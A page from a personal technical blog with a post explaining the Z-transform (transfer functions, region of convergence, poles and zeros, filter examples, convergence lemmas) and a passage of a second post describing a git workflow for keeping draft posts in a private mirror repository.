NP-Incompleteness — Kunigami’s Technical Blog, by Guilherme Kunigami

Z-Transform (2021-09-10) — https://www.kuniga.me/blog/2021/09/10/z-transform <!-- This needs to be defined as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll learn about the Z-transform. This is a continuation of the study of <a href="https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html">Discrete Filters</a>, so it’s highly recommended to check that post first.</p> <!--more--> <h2 id="constant-coefficient-difference-equations">Constant-Coefficient Difference Equations</h2> <p>A more general form of a discrete filter is</p> $\sum_{k = -\infty}^{\infty} a_k y_{t-k} = \sum_{k = -\infty}^{\infty} b_k x_{t-k}$ <p>In Discrete Filters, we had $a_0 = 1$ and the rest of the $a$’s equal to $0$, leading to:</p> $y_{t} = \sum_{k = -\infty}^{\infty} b_k x_{t-k}$ <p>And if we say $\vec{b}$ is the impulse response $\vec{h}$, we get the definition of convolution $\vec{y} = \vec{x} * \vec{h}$.</p> <p>Now suppose only that $a_0 = 1$, assuming nothing about the rest, so we have:</p> $(1) \qquad y_{t} = \sum_{k = -\infty}^{\infty} b_k x_{t-k} - \sum_{k = -\infty, k \ne 0}^{\infty} a_k y_{t-k}$ <p>We can interpret this as the current output depending on previous outputs.
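When only finitely many coefficients are nonzero, equation (1) maps directly to code. A minimal sketch in Python (the function name and the zero-for-negative-time convention are my own):

```python
def ccde_filter(b, a, x):
    """Evaluate y_t = sum_k b[k] x[t-k] - sum_{k >= 1} a[k] y[t-k].

    Assumes a causal filter: b and a hold the coefficients for
    k = 0, 1, ..., with a[0] normalized to 1 (a[0] itself is not used),
    and the signals are zero for t < 0.
    """
    y = []
    for t in range(len(x)):
        acc = sum(b[k] * x[t - k] for k in range(len(b)) if t - k >= 0)
        acc -= sum(a[k] * y[t - k] for k in range(1, len(a)) if t - k >= 0)
        y.append(acc)
    return y

# Moving average of size 2 (b = [0.5, 0.5], no recursive part):
print(ccde_filter([0.5, 0.5], [1.0], [1, 1, 1, 1]))  # [0.5, 1.0, 1.0, 1.0]
```

Setting some $a_k$ for $k \ge 1$ to nonzero values makes the output recursive, which is exactly the case discussed here.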
This is known as a <em>Constant-Coefficient Difference Equation</em> or <strong>CCDE</strong>.</p> <h2 id="z-transform">Z-Transform</h2> <p>The Z-transform is a function of a vector $\vec{x}$ and a complex variable $z \in \mathbb{C}$, defined as:</p> $(2) \qquad \mathscr{Z}(\vec{x}, z) = \sum_{t = -\infty}^{\infty} x_t z^{-t}$ <p>If we set $z = e^{i \omega}$ for $0 \le \omega \le 2 \pi$ we get the <a href="https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform.html">Discrete-Time Fourier Transform</a>, so we can think of the Z-transform as a generalization of the DTFT.</p> <p>According to [1], the Z-transform doesn’t have a physical interpretation like the DTFT does, but it’s useful as a mathematical tool.</p> <h3 id="properties">Properties</h3> <p><strong>Linearity.</strong> Given vectors $\vec{x}, \vec{y}$ and scalars $\alpha, \beta$, the Z-transform satisfies:</p> $\mathscr{Z}(\alpha \vec{x} + \beta \vec{y}, z) = \alpha \mathscr{Z}(\vec{x}, z) + \beta \mathscr{Z}(\vec{y}, z)$ <p><strong>Time-shift.</strong> Let $\vec{x}$ be a vector and $\vec{x}’$ another vector corresponding to the entries in $\vec{x}$ shifted by $N$ positions, that is, $x’_t = x_{t-N}$. Then the Z-transform satisfies:</p> $\mathscr{Z}(\vec{x}', z) = z^{-N} \mathscr{Z}(\vec{x}, z)$ <p>It follows that</p> $(3) \qquad z^{-N} \mathscr{Z}(\vec{x}, z) = \sum_{t = -\infty}^{\infty} x_{t - N} z^{-t}$ <h3 id="z-transform-on-ccdes">Z-Transform on CCDEs</h3> <p>What happens if we apply the Z-transform to (1)?
Let’s define $Y(z) = \mathscr{Z}(\vec{y}, z)$ and $X(z) = \mathscr{Z}(\vec{x}, z)$ to simplify the notation.</p> <p>We have</p> $Y(z) = \sum_{t = -\infty}^{\infty} y_t z^{-t}$ <p>Replacing $y_t$ from (1):</p> $Y(z) = \sum_{t = -\infty}^{\infty} \left(\sum_{k = -\infty}^{\infty} b_k x_{t-k} - \sum_{k = -\infty, k \ne 0}^{\infty} a_k y_{t-k}\right) z^{-t}$ <p>We can re-arrange the sums to obtain:</p> $Y(z) = \left(\sum_{k = -\infty}^{\infty} b_k \sum_{t = -\infty}^{\infty} x_{t-k} z^{-t} \right) - \left(\sum_{k = -\infty, k \ne 0}^{\infty} a_k \sum_{t = -\infty}^{\infty} y_{t-k} z^{-t} \right)$ <p>We note from (3) that the inner sums are $X(z) z^{-k}$ and $Y(z) z^{-k}$ respectively:</p> $Y(z) = \sum_{k = -\infty}^{\infty} b_k X(z) z^{-k} - \sum_{k = -\infty, k \ne 0}^{\infty} a_k Y(z) z^{-k}$ <p>We can re-arrange to isolate $Y(z)$ and get:</p> $Y(z) = \frac{\sum_{k = -\infty}^{\infty} b_k X(z) z^{-k}}{1 + \sum_{k = -\infty, k \ne 0}^{\infty} a_k z^{-k}}$ <p>Since $X(z)$ is independent of $k$:</p> $Y(z) = \frac{\sum_{k = -\infty}^{\infty} b_k z^{-k}}{1 + \sum_{k = -\infty, k \ne 0}^{\infty} a_k z^{-k}} X(z)$ <p>We define the first factor as $H(z)$, known as the <strong>transfer function</strong> of the filter described by the CCDE:</p> $Y(z) = H(z) X(z)$ <p>The transfer function is the Z-transform of the impulse response of the filter. To see why, recall that to obtain the impulse response of a system we set $\vec{x} = \vec{\delta}$ when computing $\vec{y}$. It’s easy to see that $X(z) = \mathscr{Z}(\vec{\delta}, z) = 1$, so $Y(z) = H(z)$.</p> <p>The choice of $H$ to denote the transfer function is thus no coincidence, since it is closely related to the impulse response $\vec{h}$.</p> <h2 id="convergence">Convergence</h2> <h3 id="region-of-convergence">Region of Convergence</h3> <p>Recall that $z$ is a complex variable, so we can “visualize” its domain as the 2D plane (complex plane).
The set of values of $z$ such that the sum in (2) converges absolutely is defined as the <strong>region of convergence</strong>, or $ROC\curly{\mathscr{Z}(\vec{x}, z) }$.</p> <p>We can split (2) in two, so that both sums start from index 0 and have the form over which we usually define convergence:</p> $\mathscr{Z}(\vec{x}, z) = \sum_{t = -\infty}^{-1} x_t z^{-t} + \sum_{t = 0}^{\infty} x_t z^{-t} = \sum_{t = 1}^{\infty} x_{-t} z^{t} + \sum_{t = 0}^{\infty} x_t \left(\frac{1}{z}\right)^{t}$ <p>For $\mathscr{Z}(\vec{x}, z)$ to exist, both sums must converge. Each of them defines a complex power series, that is, a series of the form $\sum_{k = 0}^{\infty} c_k w^k$ (with $w = z$ for the first sum and $w = 1/z$ for the second).</p> <p>It’s possible to show (see <em>Appendix</em>) that given a complex power series there is $0 \le R \le \infty$ such that it converges absolutely for $\abs{w} &lt; R$ and diverges for $\abs{w} &gt; R$.</p> <p>We can thus find the radius for each of the complex power series, say $R_1$ for the one in $z$ and $R_2$ for the one in $1/z$. The first converges for $\abs{z} &lt; R_1$ and the second for $\abs{1/z} &lt; R_2$, that is, $\abs{z} &gt; 1/R_2$, so the region of convergence is $1/R_2 &lt; \abs{z} &lt; R_1$.</p> <p>Note that the region of convergence defines an annulus (a ring) when visualized in the complex plane.</p> <h3 id="convergence-and-stability">Convergence and Stability</h3> <p>In <a href="https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html">Discrete Filters</a>, we showed that a system is bounded-input bounded-output (BIBO) if, and only if, its impulse response $\vec{h}$ is absolutely summable.</p> <p>Recall that the transfer function is the Z-transform of the impulse response of the filter:</p> $H(z) = \mathscr{Z}(\vec{h}, z) = \sum_{t = -\infty}^{\infty} h_t z^{-t}$ <p>If $H(z)$ is absolutely convergent for $\abs{z} = 1$, then $\sum_{t = -\infty}^{\infty} \abs{h_t z^{-t}}$ converges, and since $\abs{a b} = \abs{a} \abs{b}$, then $\sum_{t = -\infty}^{\infty} \abs{h_t} \abs{z^{-t}} = \sum_{t = -\infty}^{\infty} \abs{h_t}$ also converges.</p> <p>We conclude that a system is BIBO if its ROC contains $\abs{z} = 1$.</p> <h2 id="poles-and-zeros">Poles and Zeros</h2> <h3
id="realizable-filters">Realizable Filters</h3> <p>A filter is <strong>realizable</strong> if we can implement it via some finite algorithm, which means that $y_t$ in (1) can only depend on a finite number of terms and is causal (i.e. only depends on past terms):</p> $y_{t} = \sum_{k = 0}^{M-1} b_k x_{t-k} - \sum_{k = 1}^{N-1} a_k y_{t-k}$ <p>The transfer function of a realizable filter is a ratio of finite-degree polynomials (in $z^{-1}$), in which case it’s also called a <strong>rational transfer function</strong>:</p> $H(z) = \frac{\sum_{k = 0}^{M-1} b_k z^{-k}}{1 + \sum_{k = 1}^{N-1} a_k z^{-k}}$ <h3 id="poles-of-the-transfer-function">Poles of the Transfer Function</h3> <p>Since the sums in the Z-transform of a realizable filter are finite, they always converge. However, for the transfer function to exist, the denominator of $H(z)$ must be non-zero.</p> <p>We thus need to find the values of $z$ for which this polynomial is zero:</p> $1 + a_1 z^{-1} + a_2 z^{-2} + \cdots + a_{N-1} z^{-(N-1)}$ <p>In other words, we want to find the roots of this polynomial, say $p_1, \cdots, p_{N-1}$, which in this context are known as the <strong>poles</strong> of the transfer function. The ROC cannot contain any poles.</p> <p>Let $p^*$ be the pole with highest magnitude. Thus if $\abs{z} &gt; \abs{p^{*}}$ we’re guaranteed to avoid zeros in the denominator.</p> <p>Moreover, if $\abs{p^*} &lt; 1$, there’s a region defined by $\abs{p^*} &lt; \abs{z}$, containing $\abs{z} = 1$, where the system is convergent and BIBO.</p> <h3 id="zeros-of-the-transfer-function">Zeros of the Transfer Function</h3> <p>We can similarly find the roots of the polynomial in the numerator of $H(z)$, say $z_1, \cdots, z_{M-1}$.
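Numerically, poles and zeros are just polynomial roots: multiplying the numerator and the denominator of $H(z)$ by a suitable power of $z$ turns each into an ordinary polynomial whose coefficients, in descending powers of $z$, are exactly the $b$’s and $1, a_1, \cdots, a_{N-1}$. A sketch using `numpy.roots` (the helper name and example coefficients are mine):

```python
import numpy as np

def poles_and_zeros(b, a):
    """Zeros and poles of H(z) = (sum_k b[k] z^-k) / (1 + sum_{k>=1} a[k] z^-k).

    b and a are the CCDE coefficients; a[0] is assumed to be 1.
    """
    zeros = np.roots(b)                               # roots of the numerator
    poles = np.roots(np.concatenate(([1.0], a[1:])))  # roots of the denominator
    return zeros, poles

# H(z) = 0.5 / (1 - 0.5 z^-1): no zeros, a single pole at z = 0.5.
zeros, poles = poles_and_zeros([0.5], [1.0, -0.5])
```

For this example `poles` comes out as `[0.5]` and `zeros` is empty, so the region $\abs{z} &gt; 0.5$ avoids the pole and contains the unit circle.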
We can then express the transfer function as a product of factors.</p> <p>For each root $r$, we can add a factor $(z - r)$ or, to keep it in terms of $z^{-1}$, $(1 - r z^{-1})$, noting both evaluate to 0 when $z = r$.</p> $(4) \qquad H(z) = b_0 \frac{\prod_{k = 1}^{M-1} (1 - z_k z^{-1})}{\prod_{k = 1}^{N-1} (1 - p_k z^{-1})}$ <p>We assume the numerator and denominator are co-prime, so no factors can be cancelled out.</p> <h3 id="the-pole-zero-plot">The Pole-Zero Plot</h3> <p>We can visualize the zeros and poles in the complex plane for $z$. The convention is to display poles as crosses (X) and zeros as circles (O).</p> <p>We also overlay the unit circle, because the system is BIBO when the ROC contains it. We can use this plot to quickly detect if any poles lie outside of the unit circle. Figure 1 has two example filters.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-09-10-z-transform/zero-pole-plot.png" alt="See caption" /> <figcaption>Figure 1: Examples of Pole-Zero Plots.
Screenshot from [1].</figcaption> </figure> <p>If we were to plot $\abs{H(z)}$ (z-axis) over $z$ (xy-plane) we’d have a 3D plot where for zeros $\abs{H(z)} = 0$ and for poles $\abs{H(z)} = \infty$; visually the poles would look like, guess what… poles, hence the name.</p> <h3 id="filtering-poles-out">Filtering Poles Out</h3> <p>When we apply one filter after another, we can get the resulting impulse response via convolution, as we briefly mention in <a href="https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html">Discrete Filters</a>.</p> <p>If the impulse responses are absolutely summable, we can apply the convolution theorem also described previously [4] (we proved it for the DTFT but it can be easily generalized to the Z-transform).</p> <p>Using the convolution theorem, if the combined impulse response of two filters is the convolution $\vec{h_1} * \vec{h_2}$, the combined transfer function is the product of their Z-transforms $\mathscr{Z}(\vec{h_1}, z) \mathscr{Z}(\vec{h_2}, z)$.</p> <p>Looking at the definition of (4), we can combine filters to remove poles from one another. For example, suppose $\mathscr{Z}(\vec{h_1}, z)$ has a pole $\abs{p_i} &gt; 1$ we want to remove. We can configure the second filter so that the <em>numerator</em> in $\mathscr{Z}(\vec{h_2}, z)$ contains a factor $(1 - z_j z^{-1})$ (with $z_j = p_i$) that can cancel out the factor $(1 - p_i z^{-1})$ in the denominator of $\mathscr{Z}(\vec{h_1}, z)$!</p> <h2 id="examples">Examples</h2> <h3 id="moving-average">Moving Average</h3> <p>Recall from [4] that the moving average filter is:</p> $y_t = \mathscr{H}(\vec{x}, t) = \frac{1}{N} \sum_{k = 0}^{N - 1} x_{t - k}$ <p>So we have:</p> $H(z) = \frac{1}{N} \sum_{t = 0}^{N-1} z^{-t}$ <p>Which is a geometric sum with closed form:</p> $H(z) = \frac{1}{N} \frac{1 - z^{-N}}{1 - z^{-1}}$ <p>In Figure 2 we plot $\abs{H(z)}$ (z-axis) over $z$ (xy-plane).
When $\abs{z} \rightarrow 0$, then $\abs{z^{-N}} \rightarrow \infty$, so we have to crop the chart for low values of $\abs{z}$.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-09-10-z-transform/abs_xfer_func.png" alt="3D surface plot showing that as we approach the xy-origin, H(z) goes to infinity" /> <figcaption>Figure 2: plot of |H(z)| for the moving average with N = 8</figcaption> </figure> <p>Let’s define $z’ = 1/z$. The roots of the numerator are the values $z’$ which, raised to $N$, yield 1. They’re known as the <a href="https://en.wikipedia.org/wiki/Root_of_unity">roots of unity</a> and are of the form $z’ = e^{(2 k \pi i)/N}$ for $k = 0, \cdots, N-1$.</p> <p>In other words, when $z = e^{(-2 k \pi i)/N}$ for $k = 0, \cdots, N-1$, then $H(z) = 0$. Further, when $k = 0$, $z = 1$ and the corresponding factor cancels out the denominator. We can then write $H(z)$ as a product over the remaining roots:</p> $H(z) = \frac{1}{N} \prod_{k = 1}^{N-1} (1 - e^{(-2 k \pi i)/N} z^{-1})$ <p>This means the moving average filter does not have poles. This is curious because $\abs{H(z)}$ tends to infinity as $z \rightarrow 0$, so in that sense it does look like a pole, but it’s not one according to the definition.</p> <p>If we plot the zeros on the complex plane, we’ll have $N - 1$ dots evenly spread out on the unit circle (all the $N$-th roots of unity except $z = 1$).</p> <h3 id="leaky-integrator">Leaky Integrator</h3> <p>Recall from [4] that the leaky integrator filter is:</p> $y_t = \lambda y_{t - 1} + (1 - \lambda) x_t$ <p>With $b_0 = (1 - \lambda)$ and $a_1 = -\lambda$ and all the other coefficients 0, so we have:</p> $H(z) = \frac{1 - \lambda}{1 - \lambda z^{-1}}$ <p>The pole is at $z = \lambda$, so we achieve convergence when $\abs{z} &gt; \lambda$.
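We can check the pole location against the time domain: feeding a unit impulse through the recursion gives $h_t = (1 - \lambda) \lambda^t$, and $H(z) = \sum_t h_t z^{-t}$ is then a geometric series that converges exactly when $\abs{\lambda / z} &lt; 1$, i.e. $\abs{z} &gt; \lambda$. A small numerical sketch ($\lambda = 0.5$ is an arbitrary choice):

```python
lam = 0.5

# Impulse response of y_t = lam * y_{t-1} + (1 - lam) * x_t for x = delta.
h = []
y_prev = 0.0
for t in range(8):
    x_t = 1.0 if t == 0 else 0.0  # unit impulse
    y_t = lam * y_prev + (1 - lam) * x_t
    h.append(y_t)
    y_prev = y_t

# The response matches (1 - lam) * lam**t: a geometric decay driven by the pole.
assert all(abs(h[t] - (1 - lam) * lam**t) < 1e-12 for t in range(8))
```

Since $\abs{\lambda} &lt; 1$ this impulse response is absolutely summable, consistent with the ROC containing the unit circle.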
Finally, the system is stable if $\lambda &lt; 1$.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-09-10-z-transform/zero-pole-examples.png" alt="See caption" /> <figcaption>Figure 3: Pole-Zero Plots for moving average and leaky integrator, respectively. Screenshot from [1]</figcaption> </figure> <h2 id="conclusion">Conclusion</h2> <p>The main reason I picked up the book from Prandoni and Vetterli [1] was to learn about the Z-transform. I was trying to learn about some other DSP topic and a lot of the ideas were over my head, and I realized I needed a better foundation. The region of convergence of the transfer function was one of the things I couldn’t get, but I now have a much better grasp of it.</p> <p>While studying this topic, I had some very vague recollections of having seen something similar to the region of convergence in the unit circle during my undergraduate years. I looked up the curriculum and found <a href="https://www.fee.unicamp.br/node/917">EE400</a>, which does mention complex numbers and power series, but not the Z-transform.</p> <p>It’s likely it was the Laplace transform I learned about, which is the continuous version of the Z-transform [5]. Analogously, CCDEs are the discrete counterpart to differential equations. Despite the similar names, I didn’t make the connection, and I’d like to learn more about their similarities at some point.</p> <p>The book [1] mentions in passing that when a complex power series converges it converges absolutely.
Maybe it’s a well-known result, but it was pretty tricky for me to see why that’s the case and I had to go over several steps in the <em>Appendix</em> to convince myself.</p> <p>This was the first time I used matplotlib’s 3D plot and it’s possibly the first time I’ve plotted a 3D chart.</p> <h2 id="related-posts">Related Posts</h2> <p><a href="https://www.kuniga.me/blog/2021/07/31/lpc-in-python.html">Linear Predictive Coding in Python</a> - While looking into translating the Matlab code into Python, I had to look up the definition of <a href="https://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.lfilter.html">lfilter</a>, which I couldn’t understand at the time.</p> <p>The docs describe a filter in terms of the coefficients $a$ and $b$ in the CCDE form (which they call <em>direct II transposed structure</em>). It also mentions the rational transfer function! Everything makes much more sense now.</p> <p>So when we have:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">b</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">concatenate</span><span class="p">([</span><span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">([</span><span class="o">-</span><span class="mi">1</span><span class="p">]),</span> <span class="n">a</span><span class="p">])</span> <span class="n">x_hat</span> <span class="o">=</span> <span class="n">lfilter</span><span class="p">([</span><span class="mi">1</span><span class="p">],</span> <span class="n">b</span><span class="p">.</span><span class="n">T</span><span class="p">,</span> <span class="n">src</span><span class="p">.</span><span class="n">T</span><span class="p">).</span><span class="n">T</span></code></pre></figure> <p>We’re basically describing a filter:</p> $y_t = -x_{t} + \sum_{i = 1}^{n} a_i y_{t - i}$ <p>Where $\vec{x}$ is <code class="language-plaintext highlighter-rouge">src</code> and
$\vec{y}$ is <code class="language-plaintext highlighter-rouge">x_hat</code>.</p> <h2 id="appendix">Appendix</h2> <p>It’s worth recalling that a complex series</p> $\sum_{k = 0}^{\infty} c_k, \quad \mbox{where } c_k = a_k + i b_k \in \mathbb{C}$ <p>converges if both its real and imaginary series:</p> $\sum_{k = 0}^{\infty} a_k \qquad \mbox{and} \qquad \sum_{k = 0}^{\infty} b_k$ <p>converge. A complex series converges <strong>absolutely</strong> if the following real series converges:</p> $\sum_{k = 0}^{\infty} \abs{c_k}, \qquad \abs{c_k} = \sqrt{a_k^2 + b_k^2}$ <p>Let’s consider some lemmas.</p> <p><strong>Lemma 1.</strong> If a real series $\sum_{n = 0}^{\infty} a_n$ converges, then $\lim_{n \rightarrow \infty} a_n = 0$.</p> <p><em>Proof.</em> Consider the partial sum $S_n = \sum_{k = 0}^{n} a_k$. By definition, $\sum_{k = 0}^{\infty} a_k$ is convergent if $\lim_{n \rightarrow \infty} S_n = L$ for some real $L$, and so $\lim_{n \rightarrow \infty} S_{n+1} = L$. We have that $a_{n + 1} = S_{n+1} - S_{n}$, so $\lim_{n \rightarrow \infty} a_{n + 1} = L - L = 0$. <em>QED</em></p> <p><strong>Lemma 2.</strong> If a complex series converges, then $\lim_{n \rightarrow \infty} \abs{c_n} = 0$.</p> <p><em>Proof.</em> By definition $\sum_{n = 0}^{\infty} a_n$ and $\sum_{n = 0}^{\infty} b_n$ converge, so by <em>Lemma 1</em>, $\lim_{n \rightarrow \infty} a_n = 0$ and $\lim_{n \rightarrow \infty} b_n = 0$, thus $\lim_{n \rightarrow \infty} \abs{c_n} = \lim_{n \rightarrow \infty} \sqrt{a_n^2 + b_n^2} = 0$. <em>QED</em></p> <p><strong>Lemma 3.</strong> Consider the complex power series $\sum_{n = 0}^{\infty} z^n$.
If $\abs{z} &lt; 1$ then it converges <em>absolutely</em>, and if $\abs{z} \ge 1$, it diverges.</p> <p><em>Proof.</em> If $\abs{z} &lt; 1$, then $\sum_{n = 0}^{\infty} \abs{z}^n$ is a geometric series, whose partial sums have the closed form</p> $\frac{1 - \abs{z}^{n + 1}}{1 - \abs{z}}$ <p>Because $\lim_{n \rightarrow \infty} \abs{z}^{n + 1} = 0$, the geometric series converges to $1 / (1 - \abs{z})$. Since $\abs{z}^n = \abs{z^n}$, it follows that $\sum_{n = 0}^{\infty} \abs{z^n}$ is convergent.</p> <p>Conversely, if $\abs{z} \ge 1$, then $\abs{z^n} \ge 1 \ne 0$, so $\sum_{n = 0}^{\infty} z^n$ must diverge, otherwise it would contradict <em>Lemma 2</em>. <em>QED</em></p> <p><strong>Lemma 4.</strong> If $\sum_{n = 0}^{\infty} a_n$ converges, then there exists $M$ such that $\abs{a_n} \le M$ for all $n$.</p> <p><em>Proof.</em> By definition, given an arbitrary $\epsilon &gt; 0$, there exist $L$ and $N$ such that $\abs{S_n - L} &lt; \epsilon$ for $n \ge N$. Then $\abs{S_{n+1} - L} &lt; \epsilon$ as well, and since $\abs{a_{n+1}} = \abs{S_{n+1} - S_n} \le \abs{S_{n+1} - L} + \abs{L - S_n}$, we have $\abs{a_{n+1}} &lt; 2 \epsilon$ for $n \ge N$.</p> <p>Now, since $N$ is finite, the upper bound $M' = \max(\abs{a_n})$ for $n \le N$ is defined. It’s easy to see that $\abs{a_n} \le \max(M', 2\epsilon)$ for all $n$. <em>QED</em></p> <p>Consider the following complex power series:</p> $(5) \quad \sum_{k = 0}^{\infty} c_k z^k, \qquad c_k, z \in \mathbb{C}$ <p><strong>Lemma 5.</strong> Suppose (5) converges for $z = w_0 \ne 0$.
If $\abs{w} &lt; \abs{w_0}$, then (5) converges <em>absolutely</em> for $z = w$.</p> <p><em>Proof.</em> We can write $\abs{c_n w^n}$ as:</p> $\abs{c_n w^n} = \abs{c_n w_0^n \frac{w^n}{w_0^n}} = \abs{c_n w_0^n} \abs{\frac{w^n}{w_0^n}} = \abs{c_n w_0^n} \abs{\frac{w}{w_0}}^n$ <p>Since (5) is convergent for $z = w_0$, by <em>Lemma 4</em>, there exists $M$ such that $\abs{c_n w_0^n} &lt; M$, so,</p> $\abs{c_n w^n} &lt; M \abs{\frac{w}{w_0}}^n$ <p>Since $\abs{w} &lt; \abs{w_0}$, we have $\abs{\frac{w}{w_0}} &lt; 1$ and we can use <em>Lemma 3</em> to show that $\sum_{n = 0}^{\infty} \abs{\frac{w}{w_0}}^n$ converges, so</p> $\sum_{n = 0}^{\infty} \abs{c_n w^n} &lt; \sum_{n = 0}^{\infty} M \abs{\frac{w}{w_0}}^n = M \sum_{n = 0}^{\infty} \abs{\frac{w}{w_0}}^n$ <p>also converges and we conclude that $\sum_{n = 0}^{\infty} c_n z^n$ is absolutely convergent for $z = w$. <em>QED</em></p> <p><strong>Corollary 6.</strong> A consequence of <em>Lemma 5</em> is that there exists some value $R$ such that (5) converges absolutely for $\abs{z} &lt; R$ and diverges for $\abs{z} &gt; R$ (at $\abs{z} = R$ it may either converge or diverge).</p> <p><strong>Corollary 7.</strong> Given the power series (5), we have three possibilities regarding convergence:</p> <ul> <li>It only converges for $z = 0$ and diverges for $\abs{z} &gt; 0$</li> <li>It converges for any $z$</li> <li>There is $0 &lt; R &lt; \infty$ such that it converges absolutely for $\abs{z} &lt; R$ and diverges for $\abs{z} &gt; R$ (<em>Corollary 6</em>).</li> </ul> <p>The third case can be seen as a more general version of the first two.
The first one happens when $R = 0$, the second when $R = \infty$.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">1</a>] Signal Processing for Communications, Prandoni and Vetterli</li> <li>[<a href="https://faculty.math.illinois.edu/~clein/honors7solf11.pdf">2</a>] Honors Problem 7: Complex Series</li> <li>[<a href="https://en.wikipedia.org/wiki/Absolute_value_(algebra)">3</a>] Absolute value (algebra)</li> <li>[<a href="https://www.kuniga.me/blog/2021/08/31/discrete-time-filters.html">4</a>] NP-Incompleteness: Discrete Filters</li> <li>[<a href="https://www.quora.com/What-is-the-difference-between-Laplace-and-Fourier-and-z-transforms">5</a>] Quora: What is the difference between Laplace and Fourier and z transforms?</li> </ul> <p>The 3D chart was generated using Matplotlib, with the source code available as a <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-09-10-z-transform/charts.ipynb">Jupyter notebook</a>.</p>

Writing Posts (2021-09-01) — https://www.kuniga.me/blog/2021/09/01/writing-posts <!-- This needs to be defined as included html because variables are not inherited by Jekyll pages --> <p>This is a meta post to describe my flow for writing posts.
When I <a href="https://www.kuniga.me/blog/2020/07/11/from-wordpress-to-jekyll.html">moved to static Github pages</a> over a year ago, I didn’t have a flow I was satisfied with, but I’ve recently settled on one which I think is worth documenting.</p> <!--more--> <p>It’s worth recalling that with static Github pages I write posts in markdown and manage them using git (and Github).</p> <p>The overall idea is to be able to write a post in draft mode, hidden from view, and only when it’s ready merge it into master, where it’s automatically picked up by Github pages and made public.</p> <h2 id="early-drafts">Early drafts</h2> <p>I usually have a bunch of topics I’d like to write about at any one time, so I keep these early-stage drafts as Google docs, which are mostly a collection of links and some comments.</p> <p>Once I’m confident enough that one will become a future post, I move it to markdown.</p> <h2 id="private-branch">Private Branch</h2> <p>In the past I’d keep un-committed markdown files plus images for the posts, occasionally backing them up by copying them to Dropbox.</p> <p>Needless to say, it’s a subpar flow. I was really looking for a way to use git to back up my changes but didn’t want them to show up in my repository while in development.</p> <p>I started looking for private branches but they don’t exist. An alternative was proposed in this Stack Overflow answer [1]. The idea is to keep a private mirror of the main repo and commit only to the private one, occasionally syncing with the public one.</p> <p>Suppose the name of our main blog repository is <code class="language-plaintext highlighter-rouge">blog</code>.</p> <h3 id="create-a-new-private-repo">Create a new private repo</h3> <p>Github supports creating <a href="https://github.blog/2019-01-07-new-year-new-github/">private repositories for free</a>.
Let’s call it <code class="language-plaintext highlighter-rouge">draft-blog</code>.</p> <h3 id="create-a-mirror-repo">Create a mirror repo</h3> <p>Here we copy the steps from the <a href="https://docs.github.com/en/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-github/duplicating-a-repository">Github docs</a> [3].</p> <p>Create a bare clone of the repository:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>git clone <span class="nt">--bare</span> https://github.com/exampleuser/blog.git</code></pre></figure> <p>Mirror-push to the new repository:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cd </span>blog <span class="nv">$ </span>git push <span class="nt">--mirror</span> https://github.com/exampleuser/draft-blog.git</code></pre></figure> <p>Remove the temporary local repository you created earlier:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cd</span> .. <span class="nv">$ </span><span class="nb">rm</span> <span class="nt">-rf</span> blog</code></pre></figure> <h3 id="clone-the-new-repo-locally">Clone the new repo locally</h3> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>git clone git@github.com:exampleuser/draft-blog.git</code></pre></figure> <h3 id="add-remotes">Add remotes</h3> <p>A git remote is basically an alias for the URL of the remote repo. When we use <code class="language-plaintext highlighter-rouge">git clone</code>, it adds a default alias called <code class="language-plaintext highlighter-rouge">origin</code>, which points to the original repo.
We can inspect via <code class="language-plaintext highlighter-rouge">git remote -v</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>fetch<span class="o">)</span> origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>push<span class="o">)</span></code></pre></figure> <p>Note we have one entry for read (fetch) and one for write (push).</p> <p>We want to add another remote that points to the public blog, that is <code class="language-plaintext highlighter-rouge">git@github.com:exampleuser/blog.git</code>, and name it <code class="language-plaintext highlighter-rouge">public</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>git remote add public git@github.com:exampleuser/blog.git</code></pre></figure> <p>If we type <code class="language-plaintext highlighter-rouge">git remote -v</code> we should see 4 entries now:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>fetch<span class="o">)</span> origin git@github.com:exampleuser/draft-blog.git <span class="o">(</span>push<span class="o">)</span> public git@github.com:exampleuser/blog.git <span class="o">(</span>fetch<span class="o">)</span> public git@github.com:exampleuser/blog.git <span class="o">(</span>push<span class="o">)</span></code></pre></figure> <h2 id="writing">Writing</h2> <p>Before we start writing, we create a branch. 
For this very post I created one called <code class="language-plaintext highlighter-rouge">post-writing</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git branch post-writing git checkout post-writing</code></pre></figure> <p><strong>NOTE:</strong> It’s important we create branches off the <code class="language-plaintext highlighter-rouge">master</code> branch (we’ll see why later), so always do <code class="language-plaintext highlighter-rouge">git checkout master</code> before creating a new branch.</p> <p>I usually write a bit every other day. When I’m done, I simply create a dummy commit and sync to a similarly named branch in the private repo for backup:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">git commit <span class="nt">-am</span> <span class="s2">"backup"</span> git push origin post-writing</code></pre></figure> <p>Since I always push to a branch of the same name on the remote, I set the <code class="language-plaintext 